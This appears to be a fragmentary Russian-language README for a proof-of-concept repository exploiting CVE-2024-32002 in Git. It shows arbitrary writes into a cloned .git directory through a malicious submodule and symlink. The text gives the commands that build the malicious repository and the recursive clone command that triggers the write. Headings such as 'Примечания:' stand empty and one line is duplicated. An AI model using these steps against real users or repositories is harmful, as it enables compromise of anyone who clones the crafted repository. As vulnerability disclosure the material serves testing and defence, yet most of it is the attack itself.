
POC для CVE-2024-32002, демонстрирующий произвольную запись в каталог .git.
POC для CVE-2024-32002, демонстрирующий произвольную запись в каталог .git.
Смотрите cve-2024-32002-submodule-aw для соответствующего репозитория подмодуля.
.git..gitmodules, определяющий вредоносный подмодуль.Этот репозиторий был создан в Linux (точнее, в WSL2). Это важно: вредоносный репозиторий можно создать только в файловой системе, чувствительной к регистру.
ln -s .git submodule
Примечания:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
Примечания:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git